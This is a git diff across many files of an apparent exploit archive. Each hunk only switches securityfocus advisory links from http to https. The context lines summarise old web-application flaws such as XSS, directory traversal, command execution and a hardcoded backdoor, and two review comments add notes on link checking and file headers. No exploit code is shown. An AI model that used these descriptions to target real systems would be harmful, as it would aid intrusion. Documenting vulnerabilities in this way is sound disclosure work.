force the server to disclose system configuration information or initiate cross-site scripting. diff --git a/exploits/cgi/webapps/23549.txt b/exploits/cgi/webapps/23549.txt index c9e438718..baacce6ac 100644 --- a/exploits/cgi/webapps/23549.txt +++ b/exploits/cgi/webapps/23549.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9439/info +source: https://www.securityfocus.com/bid/9439/info A number of vulnerabilities have been found in all version of MetaDot Corporation's MetaDot Portal Server. Due to a failure of the software to properly validate user input, an attacker may be able to corrupt data, force the server to disclose system configuration information or initiate cross-site scripting. diff --git a/exploits/cgi/webapps/23550.txt b/exploits/cgi/webapps/23550.txt index 9e5d50712..9dcdaa046 100644 --- a/exploits/cgi/webapps/23550.txt +++ b/exploits/cgi/webapps/23550.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9439/info +source: https://www.securityfocus.com/bid/9439/info A number of vulnerabilities have been found in all version of MetaDot Corporation's MetaDot Portal Server. Due to a failure of the software to properly validate user input, an attacker may be able to corrupt data, force the server to disclose system configuration information or initiate cross-site scripting. diff --git a/exploits/cgi/webapps/23551.txt b/exploits/cgi/webapps/23551.txt index a716198ba..b76308dcc 100644 --- a/exploits/cgi/webapps/23551.txt +++ b/exploits/cgi/webapps/23551.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9439/info +source: https://www.securityfocus.com/bid/9439/info A number of vulnerabilities have been found in all version of MetaDot Corporation's MetaDot Portal Server. Due to a failure of the software to properly validate user input, an attacker may be able to corrupt data, force the server to disclose system configuration information or initiate cross-site scripting. diff --git a/exploits/cgi/webapps/23613.txt b/exploits/cgi/webapps/23613.txt index c6e69e9d3..e2d61ccea 100644 --- a/exploits/cgi/webapps/23613.txt +++ b/exploits/cgi/webapps/23613.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9517/info +source: https://www.securityfocus.com/bid/9517/info Web Blog is prone to a file disclosure vulnerability. Remote attackers may gain access to files on the system hosting the server that reside outside of the server root by submitting a malicious request that contains directory traversal sequences. This would permit the attacker to access files that are readable by the server and could disclose sensitive information. diff --git a/exploits/cgi/webapps/23615.txt b/exploits/cgi/webapps/23615.txt index b1f2968fc..b3f8fd23f 100644 --- a/exploits/cgi/webapps/23615.txt +++ b/exploits/cgi/webapps/23615.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9524/info +source: https://www.securityfocus.com/bid/9524/info It has been reported that PJ CGI Neo Review may be prone to a directory traversal vulnerability that may allow a remote attacker to access information outside the server root directory by using '../' character sequences. diff --git a/exploits/cgi/webapps/23629.txt b/exploits/cgi/webapps/23629.txt index 927b93257..2e27ed54b 100644 --- a/exploits/cgi/webapps/23629.txt +++ b/exploits/cgi/webapps/23629.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9539/info +source: https://www.securityfocus.com/bid/9539/info Web Blog has been reported to be prone to a vulnerability that may permit remote attackers to execute arbitrary commands in the context of the hosting web server. This is due to insufficient sanitization of shell metacharacters from variables which will be used as an argument to a function that invokes the shell directly. diff --git a/exploits/cgi/webapps/23647.txt b/exploits/cgi/webapps/23647.txt index 4678db564..40aa76b12 100644 --- a/exploits/cgi/webapps/23647.txt +++ b/exploits/cgi/webapps/23647.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9575/info +source: https://www.securityfocus.com/bid/9575/info The rxgoogle.cgi search script is prone to a cross-site scripting vulnerability because the software fails to sanitize user input and allows various metacharacters that may facilitate cross-site scripting attacks. diff --git a/exploits/cgi/webapps/23659.txt b/exploits/cgi/webapps/23659.txt index b0e108214..9f19ac096 100644 --- a/exploits/cgi/webapps/23659.txt +++ b/exploits/cgi/webapps/23659.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9598/info +source: https://www.securityfocus.com/bid/9598/info It has been reported that OpenJournal is prone to an authentication bypass vulnerability. This issue is caused by the application failing to properly sanitize URI specified parameters. Successful exploitation of this issue may lead to remote attackers gaining unauthorized access to online journal files associated with the application, adding new users to the database as well as a number of other possibilities. diff --git a/exploits/cgi/webapps/23705.txt b/exploits/cgi/webapps/23705.txt index b0fc588ab..57f4c66e9 100644 --- a/exploits/cgi/webapps/23705.txt +++ b/exploits/cgi/webapps/23705.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9670/info +source: https://www.securityfocus.com/bid/9670/info It has been reported that ShopcartCGI is prone to a remote file disclosure vulnerability. This issue is due to insufficient validation of user-supplied input. diff --git a/exploits/cgi/webapps/23706.txt b/exploits/cgi/webapps/23706.txt index 7d6c83387..42ea0a845 100644 --- a/exploits/cgi/webapps/23706.txt +++ b/exploits/cgi/webapps/23706.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9670/info +source: https://www.securityfocus.com/bid/9670/info It has been reported that ShopcartCGI is prone to a remote file disclosure vulnerability. This issue is due to insufficient validation of user-supplied input. 
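Review bot: the only change in each of these hunks is the scheme on line 1 (`-source: http://www.securityfocus.com/bid/9670/info` becomes `+source: https://www.securityfocus.com/bid/9670/info`, and likewise for the other bid numbers), and nothing in the patch shows that the rewritten URLs were checked. For a mechanical rewrite across this many files, the commit message should say how the replacement was validated, for example a link check run over the new `source:` lines, so that a reference that no longer resolves is not carried forward unnoticed. Several files share one reference (23548.txt through 23551.txt all point at bid 9439, 23705.txt and 23706.txt at bid 9670), so checking the distinct URLs is enough.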
diff --git a/exploits/cgi/webapps/23806.txt b/exploits/cgi/webapps/23806.txt index 940e073a2..fde0b64ab 100644 --- a/exploits/cgi/webapps/23806.txt +++ b/exploits/cgi/webapps/23806.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9853/info +source: https://www.securityfocus.com/bid/9853/info It has been reported that cPanel may be prone to a cross-site scripting vulnerability that may allow a remote attacker to execute HTML or script code in a user's browser. The issue presents itself due to insufficient sanitization of user-supplied data via the 'dir' parameter of 'dohtaccess.html' page. The victim may require to be authenticated with valid credentials to be exposed to exploitation. diff --git a/exploits/cgi/webapps/23807.txt b/exploits/cgi/webapps/23807.txt index b3fd761cd..25f050252 100644 --- a/exploits/cgi/webapps/23807.txt +++ b/exploits/cgi/webapps/23807.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9855/info +source: https://www.securityfocus.com/bid/9855/info A potential remote command execution vulnerability has been discovered in the cPanel application. This issue occurs due to insufficient sanitization of externally supplied data to the login script. An attacker may exploit this problem by crafting a malicious URI request for the affected script; the attacker may then supply shell metacharacters and arbitrary commands as a value for the affected variable. diff --git a/exploits/cgi/webapps/23809.txt b/exploits/cgi/webapps/23809.txt index f3078bbc5..97846ff89 100644 --- a/exploits/cgi/webapps/23809.txt +++ b/exploits/cgi/webapps/23809.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9861/info +source: https://www.securityfocus.com/bid/9861/info Multiple vulnerabilities have been identified in the application that may allow an attacker to carry out cross-site scripting attacks and disclose the path to the victim's home directory. The issues are reported to exist in the login script, 'emumail.fcgi' script and the 'init.emu' sample script. diff --git a/exploits/cgi/webapps/23810.txt b/exploits/cgi/webapps/23810.txt index ec0138558..9ae3b0543 100644 --- a/exploits/cgi/webapps/23810.txt +++ b/exploits/cgi/webapps/23810.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9861/info +source: https://www.securityfocus.com/bid/9861/info Multiple vulnerabilities have been identified in the application that may allow an attacker to carry out cross-site scripting attacks and disclose the path to the victim's home directory. The issues are reported to exist in the login script, 'emumail.fcgi' script and the 'init.emu' sample script. diff --git a/exploits/cgi/webapps/23890.txt b/exploits/cgi/webapps/23890.txt index 5a2a97297..77d1f42b8 100644 --- a/exploits/cgi/webapps/23890.txt +++ b/exploits/cgi/webapps/23890.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9995/info +source: https://www.securityfocus.com/bid/9995/info It has been reported that Fresh Guest Book is prone to a remote HTML injection vulnerability. This issue is due to a failure of the application to properly sanitize user supplied form input. diff --git a/exploits/cgi/webapps/23894.txt b/exploits/cgi/webapps/23894.txt index 164afdfbf..34a0175b7 100644 --- a/exploits/cgi/webapps/23894.txt +++ b/exploits/cgi/webapps/23894.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10000/info +source: https://www.securityfocus.com/bid/10000/info A vulnerability has been reported to exist in Cloisterblog that may allow a remote attacker to access information outside the server root directory. The problem exists due to insufficient sanitization of user-supplied data. The issue may allow a remote attacker to traverse outside the server root directory by using '../' character sequences. diff --git a/exploits/cgi/webapps/23897.txt b/exploits/cgi/webapps/23897.txt index dac8ed1b3..dce0a4397 100644 --- a/exploits/cgi/webapps/23897.txt +++ b/exploits/cgi/webapps/23897.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10010/info +source: https://www.securityfocus.com/bid/10010/info It has been reported that LINBOX is prone to a remote authentication bypass vulnerability. This issue is due to a design error that would allow access to web based administration scripts without proper authorization. diff --git a/exploits/cgi/webapps/23907.pl b/exploits/cgi/webapps/23907.pl index b82badff1..87f11c6d9 100755 --- a/exploits/cgi/webapps/23907.pl +++ b/exploits/cgi/webapps/23907.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10040/info +source: https://www.securityfocus.com/bid/10040/info Encore Web Forum is reported prone to an issue that may allow a remote user to execute arbitrary commands on a system implementing the forum software. This issue is due to the application's failure to properly validate user-supplied URI input. diff --git a/exploits/cgi/webapps/23913.txt b/exploits/cgi/webapps/23913.txt index 432347898..bf8bfb9d8 100644 --- a/exploits/cgi/webapps/23913.txt +++ b/exploits/cgi/webapps/23913.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10058/info +source: https://www.securityfocus.com/bid/10058/info It has been reported that FTGate is prone to multiple remote input validation vulnerabilities; a cross-site scripting issue and an HTML injection vulnerability. These issues are due to a failure of the application to properly sanitize user supplied input before using it in dynamic web content. diff --git a/exploits/cgi/webapps/23914.txt b/exploits/cgi/webapps/23914.txt index 4c49ec451..f0800f51c 100644 --- a/exploits/cgi/webapps/23914.txt +++ b/exploits/cgi/webapps/23914.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10059/info +source: https://www.securityfocus.com/bid/10059/info It has been reported that FTGate it prone to a server path disclosure vulnerability. This issue is due to an ill conceived error message that includes the server path. diff --git a/exploits/cgi/webapps/23937.txt b/exploits/cgi/webapps/23937.txt index 730c0fbb1..837cb6fa7 100644 --- a/exploits/cgi/webapps/23937.txt +++ b/exploits/cgi/webapps/23937.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10089/info +source: https://www.securityfocus.com/bid/10089/info Multiple vulnerabilities have been identified in the application that may allow a remote attacker to carry out directory traversal and cross-site scripting attacks. diff --git a/exploits/cgi/webapps/23938.txt b/exploits/cgi/webapps/23938.txt index 55f4f5689..4f029f596 100644 --- a/exploits/cgi/webapps/23938.txt +++ b/exploits/cgi/webapps/23938.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10089/info +source: https://www.securityfocus.com/bid/10089/info Multiple vulnerabilities have been identified in the application that may allow a remote attacker to carry out directory traversal and cross-site scripting attacks. diff --git a/exploits/cgi/webapps/23939.txt b/exploits/cgi/webapps/23939.txt index 79aa15d16..5b1a9f2ce 100644 --- a/exploits/cgi/webapps/23939.txt 
+++ b/exploits/cgi/webapps/23939.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10089/info +source: https://www.securityfocus.com/bid/10089/info Multiple vulnerabilities have been identified in the application that may allow a remote attacker to carry out directory traversal and cross-site scripting attacks. diff --git a/exploits/cgi/webapps/23940.txt b/exploits/cgi/webapps/23940.txt index 064540276..1de93c173 100644 --- a/exploits/cgi/webapps/23940.txt +++ b/exploits/cgi/webapps/23940.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10089/info +source: https://www.securityfocus.com/bid/10089/info Multiple vulnerabilities have been identified in the application that may allow a remote attacker to carry out directory traversal and cross-site scripting attacks. diff --git a/exploits/cgi/webapps/23941.txt b/exploits/cgi/webapps/23941.txt index 6d1a558d3..4fb63f20a 100644 --- a/exploits/cgi/webapps/23941.txt +++ b/exploits/cgi/webapps/23941.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10089/info +source: https://www.securityfocus.com/bid/10089/info Multiple vulnerabilities have been identified in the application that may allow a remote attacker to carry out directory traversal and cross-site scripting attacks. diff --git a/exploits/cgi/webapps/23942.txt b/exploits/cgi/webapps/23942.txt index fb5e1fca3..340815ca7 100644 --- a/exploits/cgi/webapps/23942.txt +++ b/exploits/cgi/webapps/23942.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10089/info +source: https://www.securityfocus.com/bid/10089/info Multiple vulnerabilities have been identified in the application that may allow a remote attacker to carry out directory traversal and cross-site scripting attacks. diff --git a/exploits/cgi/webapps/23986.txt b/exploits/cgi/webapps/23986.txt index 526e5c747..347a8c009 100644 --- a/exploits/cgi/webapps/23986.txt +++ b/exploits/cgi/webapps/23986.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10101/info +source: https://www.securityfocus.com/bid/10101/info Blackboard Learning System has been reported prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly validate user supplied URI input. diff --git a/exploits/cgi/webapps/24001.txt b/exploits/cgi/webapps/24001.txt index 3b52b840b..3d80b01c0 100644 --- a/exploits/cgi/webapps/24001.txt +++ b/exploits/cgi/webapps/24001.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10139/info +source: https://www.securityfocus.com/bid/10139/info It has been reported that Zaep AntiSpam is prone to a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user supplied URI input. diff --git a/exploits/cgi/webapps/24094.txt b/exploits/cgi/webapps/24094.txt index 24f90c3d1..e213400c1 100644 --- a/exploits/cgi/webapps/24094.txt +++ b/exploits/cgi/webapps/24094.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10294/info +source: https://www.securityfocus.com/bid/10294/info SurgeLDAP is an LDAP server implementation for Microsoft Windows and various Unix operating systems. It includes a built-in web server to permit remote user access via HTTP. diff --git a/exploits/cgi/webapps/24122.txt b/exploits/cgi/webapps/24122.txt index 4ef6b0106..effd9c824 100644 --- a/exploits/cgi/webapps/24122.txt +++ b/exploits/cgi/webapps/24122.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10359/info +source: https://www.securityfocus.com/bid/10359/info It has been reported that TurboTrafficTrader C does not properly sanitize input received from users. It has been conjectured that this may allow a remote user to launch cross-site scripting and HTML injection attacks. diff --git a/exploits/cgi/webapps/24164.txt b/exploits/cgi/webapps/24164.txt index 92d722ee5..0815cb789 100644 --- a/exploits/cgi/webapps/24164.txt 
+++ b/exploits/cgi/webapps/24164.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10445/info +source: https://www.securityfocus.com/bid/10445/info TinyWeb Server is affected by an unauthorized script disclosure vulnerability. This issue is due to an input validation error that allows malicious users to bypass standard web server rules. diff --git a/exploits/cgi/webapps/24175.txt b/exploits/cgi/webapps/24175.txt index cf9af806a..63cfc943b 100644 --- a/exploits/cgi/webapps/24175.txt +++ b/exploits/cgi/webapps/24175.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10476/info +source: https://www.securityfocus.com/bid/10476/info It is reported that Linksys Web Camera software is prone to a remote file disclosure vulnerability that may allow a remote attacker to disclose sensitive files. diff --git a/exploits/cgi/webapps/24188.pl b/exploits/cgi/webapps/24188.pl index 85d15646d..a8bd4b1cc 100755 --- a/exploits/cgi/webapps/24188.pl +++ b/exploits/cgi/webapps/24188.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10515/info +source: https://www.securityfocus.com/bid/10515/info It is reported that Blackboard improperly allows users to download files posted in the 'Digital Dropbox'. Files in the dropbox are intended for the course administrators. diff --git a/exploits/cgi/webapps/24197.txt b/exploits/cgi/webapps/24197.txt index d0f6953db..43946bf08 100644 --- a/exploits/cgi/webapps/24197.txt +++ b/exploits/cgi/webapps/24197.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10533/info +source: https://www.securityfocus.com/bid/10533/info It is reported that Linksys Web Camera software is prone to a cross-site scripting vulnerability that may allow a remote attacker to steal cookie-based authentication credentials or carry out other attacks. diff --git a/exploits/cgi/webapps/24236.txt b/exploits/cgi/webapps/24236.txt index 5abd9be97..62f345569 100644 --- a/exploits/cgi/webapps/24236.txt +++ b/exploits/cgi/webapps/24236.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10617/info +source: https://www.securityfocus.com/bid/10617/info Cart32 is reported prone to a cross-site scripting vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data. diff --git a/exploits/cgi/webapps/24237.txt b/exploits/cgi/webapps/24237.txt index 7803ebf2f..128f2e9fe 100644 --- a/exploits/cgi/webapps/24237.txt +++ b/exploits/cgi/webapps/24237.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10618/info +source: https://www.securityfocus.com/bid/10618/info A vulnerability has been identified in the application that may allow an attacker to disclose the installation path. diff --git a/exploits/cgi/webapps/24244.txt b/exploits/cgi/webapps/24244.txt index 36c4ead23..e590dabb7 100644 --- a/exploits/cgi/webapps/24244.txt +++ b/exploits/cgi/webapps/24244.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10645/info +source: https://www.securityfocus.com/bid/10645/info Netegrity IdentityMinder is a tool designed for the Microsoft Windows platform to manage and maintain users and user accounts. The tool supports a web based interface for creating and removing users in multi-user environments. diff --git a/exploits/cgi/webapps/24245.txt b/exploits/cgi/webapps/24245.txt index 4b00ec3e2..5aef72528 100644 --- a/exploits/cgi/webapps/24245.txt +++ b/exploits/cgi/webapps/24245.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10645/info +source: https://www.securityfocus.com/bid/10645/info Netegrity IdentityMinder is a tool designed for the Microsoft Windows platform to manage and maintain users and user accounts. The tool supports a web based interface for creating and removing users in multi-user environments. diff --git a/exploits/cgi/webapps/24251.txt b/exploits/cgi/webapps/24251.txt index 2b9cd246d..3e1b24fd4 100644 --- a/exploits/cgi/webapps/24251.txt +++ b/exploits/cgi/webapps/24251.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10657/info +source: https://www.securityfocus.com/bid/10657/info Symantec Brightmail anti-spam is reported prone to an unauthorized message disclosure vulnerability. diff --git a/exploits/cgi/webapps/24252.txt b/exploits/cgi/webapps/24252.txt index 6191b45bf..7ec29cd37 100644 --- a/exploits/cgi/webapps/24252.txt +++ b/exploits/cgi/webapps/24252.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10658/info +source: https://www.securityfocus.com/bid/10658/info The NetFile FTP/Web Server is reported prone to a directory traversal vulnerability due to insufficient sanitization of user-supplied data. This can allow an attacker to create, view, and delete arbitrary files outside the web root. diff --git a/exploits/cgi/webapps/24254.txt b/exploits/cgi/webapps/24254.txt index 01079c7bd..faaca1b2a 100644 --- a/exploits/cgi/webapps/24254.txt +++ b/exploits/cgi/webapps/24254.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10662/info +source: https://www.securityfocus.com/bid/10662/info BasiliX Webmail is reported to be prone to an email header HTML injection vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied email header strings. diff --git a/exploits/cgi/webapps/24284.txt b/exploits/cgi/webapps/24284.txt index 341ace498..48615329f 100644 --- a/exploits/cgi/webapps/24284.txt +++ b/exploits/cgi/webapps/24284.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10729/info +source: https://www.securityfocus.com/bid/10729/info It is reported that Gattaca Server 2003 contains multiple path disclosure vulnerabilities. diff --git a/exploits/cgi/webapps/24285.txt b/exploits/cgi/webapps/24285.txt index 2ee8b9747..c9303c6d1 100644 --- a/exploits/cgi/webapps/24285.txt +++ b/exploits/cgi/webapps/24285.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10729/info +source: https://www.securityfocus.com/bid/10729/info It is reported that Gattaca Server 2003 contains multiple path disclosure vulnerabilities. diff --git a/exploits/cgi/webapps/24286.txt b/exploits/cgi/webapps/24286.txt index ca9c70243..fdcbc89a5 100644 --- a/exploits/cgi/webapps/24286.txt +++ b/exploits/cgi/webapps/24286.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10731/info +source: https://www.securityfocus.com/bid/10731/info Gattaca Server 2003 is reported prone to a cross-site scripting vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data. diff --git a/exploits/cgi/webapps/24287.txt b/exploits/cgi/webapps/24287.txt index 194f87e99..6e61063cf 100644 --- a/exploits/cgi/webapps/24287.txt +++ b/exploits/cgi/webapps/24287.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10734/info +source: https://www.securityfocus.com/bid/10734/info BoardPower Forum is reportedly affected by a cross-site scripting vulnerability in the icq.cgi script. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/cgi/webapps/24347.txt b/exploits/cgi/webapps/24347.txt index fc8562e7f..ed9e5c88c 100644 --- a/exploits/cgi/webapps/24347.txt +++ b/exploits/cgi/webapps/24347.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10853/info +source: https://www.securityfocus.com/bid/10853/info Pete Stein GoScript is prone to a remote command execution vulnerability. diff --git a/exploits/cgi/webapps/24400.txt b/exploits/cgi/webapps/24400.txt index bebe95ae3..dc8a7bf25 100644 --- a/exploits/cgi/webapps/24400.txt +++ b/exploits/cgi/webapps/24400.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11011/info +source: https://www.securityfocus.com/bid/11011/info 1. A shell metacharacter command-execution vulnerability allows an anonymous user to download the contents of the '/etc/passwd' file on the device. Other commands are also likely to work, facilitating other attacks. diff --git a/exploits/cgi/webapps/24401.txt b/exploits/cgi/webapps/24401.txt index cccdd3cdc..d3a1899c2 100644 --- a/exploits/cgi/webapps/24401.txt +++ b/exploits/cgi/webapps/24401.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11011/info +source: https://www.securityfocus.com/bid/11011/info A directory-traversal vulnerability in HTTP POST requests. This attack is demonstrated by an anonymous user calling protected administration scripts. This bypasses authentication checks and gives anonymous users remote adminitration of the devices. diff --git a/exploits/cgi/webapps/24402.php b/exploits/cgi/webapps/24402.php index e724953f4..eafbed31f 100644 --- a/exploits/cgi/webapps/24402.php +++ b/exploits/cgi/webapps/24402.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11011/info +source: https://www.securityfocus.com/bid/11011/info A hardcoded backdoor administrative-user issue allows remote attackers to administer affected devices. This likely cannot be disabled. diff --git a/exploits/cgi/webapps/24408.txt b/exploits/cgi/webapps/24408.txt index 80ddac891..3040a9cdd 100644 --- a/exploits/cgi/webapps/24408.txt +++ b/exploits/cgi/webapps/24408.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11028/info +source: https://www.securityfocus.com/bid/11028/info WebAPP is reported prone to a directory-traversal vulnerability because the application fails to properly sanitize user-supplied input data. diff --git a/exploits/cgi/webapps/24574.txt b/exploits/cgi/webapps/24574.txt index affeb8d1a..b831fc331 100644 --- a/exploits/cgi/webapps/24574.txt +++ b/exploits/cgi/webapps/24574.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11122/info +source: https://www.securityfocus.com/bid/11122/info Webmin / Usermin are reportedly affected by a command execution vulnerability when rendering HTML email messages. This issue is due to a failure to sanitize HTML email messages and may allow an attacker to execute arbitrary commands on a vulnerable computer. diff --git a/exploits/cgi/webapps/24576.txt b/exploits/cgi/webapps/24576.txt index 1ce9e62e1..d199d95a7 100644 --- a/exploits/cgi/webapps/24576.txt +++ b/exploits/cgi/webapps/24576.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11126/info +source: https://www.securityfocus.com/bid/11126/info Reportedly UtilMind Solutions Site News is affected by an authentication bypass vulnerability. This issue is due to an access validation error. diff --git a/exploits/cgi/webapps/24591.txt b/exploits/cgi/webapps/24591.txt index 62123a48d..232b2ac4d 100644 --- a/exploits/cgi/webapps/24591.txt +++ b/exploits/cgi/webapps/24591.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11160/info +source: https://www.securityfocus.com/bid/11160/info It is reported that PerlDesk is susceptible to a server-side script execution vulnerability. diff --git a/exploits/cgi/webapps/24611.txt b/exploits/cgi/webapps/24611.txt index 63aa72c3c..558a827b9 100644 --- a/exploits/cgi/webapps/24611.txt +++ b/exploits/cgi/webapps/24611.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11214/info +source: https://www.securityfocus.com/bid/11214/info It is reported that YaBB is affected by an administrator command execution vulnerability. This issue is due to a failure of the application to properly validate access to administrative commands. diff --git a/exploits/cgi/webapps/24612.txt b/exploits/cgi/webapps/24612.txt index 4143a3cfe..2a6de5504 100644 --- a/exploits/cgi/webapps/24612.txt +++ b/exploits/cgi/webapps/24612.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11215/info +source: https://www.securityfocus.com/bid/11215/info A cross-site scripting vulnerability is reported in the YaBB forum 'YaBB.pl' script. diff --git a/exploits/cgi/webapps/24700.txt b/exploits/cgi/webapps/24700.txt index a64e962bc..d823433a3 100644 --- a/exploits/cgi/webapps/24700.txt +++ b/exploits/cgi/webapps/24700.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11504/info +source: https://www.securityfocus.com/bid/11504/info Netbilling 'nbmember.cgi' script is reported prone to an information disclosure vulnerability. This issue may allow remote attackers to gain access to user authentication credentials and potentially sensitive configuration information. diff --git a/exploits/cgi/webapps/24703.txt b/exploits/cgi/webapps/24703.txt index 94fdf99bb..e2ff16344 100644 --- a/exploits/cgi/webapps/24703.txt +++ b/exploits/cgi/webapps/24703.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11517/info +source: https://www.securityfocus.com/bid/11517/info It is reported that LinuxStat is vulnerable to a directory traversal vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/24721.txt b/exploits/cgi/webapps/24721.txt index 2198c597a..80e247182 100644 --- a/exploits/cgi/webapps/24721.txt +++ b/exploits/cgi/webapps/24721.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11596/info +source: https://www.securityfocus.com/bid/11596/info MailPost is reported prone to a cross-site scripting vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data and can allow an attacker to execute arbitrary HTML and script code in a user's browser. diff --git a/exploits/cgi/webapps/24722.txt b/exploits/cgi/webapps/24722.txt index 6c7c7bc4b..640e2fc8d 100644 --- a/exploits/cgi/webapps/24722.txt +++ b/exploits/cgi/webapps/24722.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11598/info +source: https://www.securityfocus.com/bid/11598/info MailPost is reported prone to a cross-site scripting vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data and can allow an attacker to execute arbitrary HTML and script code in a user's browser through a malicious error message returned from the application. diff --git a/exploits/cgi/webapps/24723.txt b/exploits/cgi/webapps/24723.txt index cd783bd23..df0016ca5 100644 --- a/exploits/cgi/webapps/24723.txt +++ b/exploits/cgi/webapps/24723.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11599/info +source: https://www.securityfocus.com/bid/11599/info TIPS MailPost is affected by a remote file enumeration vulnerability. This issue is due to a failure to properly sanitize user requests. diff --git a/exploits/cgi/webapps/24779.txt b/exploits/cgi/webapps/24779.txt index df506740a..104816889 100644 --- a/exploits/cgi/webapps/24779.txt +++ b/exploits/cgi/webapps/24779.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11758/info +source: https://www.securityfocus.com/bid/11758/info InMail and InShop are both reported susceptible to cross-site scripting vulnerabilities. These issues are due to a failure of the applications to properly sanitize user-supplied input prior to including it in dynamic Web pages. diff --git a/exploits/cgi/webapps/24836.txt b/exploits/cgi/webapps/24836.txt index 81a90cc7a..3bb498b9a 100644 --- a/exploits/cgi/webapps/24836.txt +++ b/exploits/cgi/webapps/24836.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11924/info +source: https://www.securityfocus.com/bid/11924/info It is reported that UseModWiki is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input before outputting it in Web Pages. 
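Review bot: in the hunks for 23907.pl, 24188.pl and 24402.php, line 1 is a bare `source: https://www.securityfocus.com/bid/.../info` followed by advisory prose as context, with no comment marker visible, and the two .pl files are mode 100755. As shown, an interpreter would read that header as code rather than as a comment. Since this commit already rewrites that line, consider prefixing it with `#` in the Perl files and placing it inside a comment in the PHP file, or recording the reference outside the script, and doing the same for the prose lines that follow it.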
